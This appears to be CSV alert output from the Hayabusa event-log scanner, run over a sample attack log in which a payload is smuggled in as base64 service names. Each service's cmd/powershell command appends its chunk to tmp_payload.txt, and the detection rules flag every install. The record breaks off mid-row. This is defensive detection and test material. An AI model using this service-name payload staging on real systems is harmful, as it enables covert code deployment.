2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:29.154 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: 
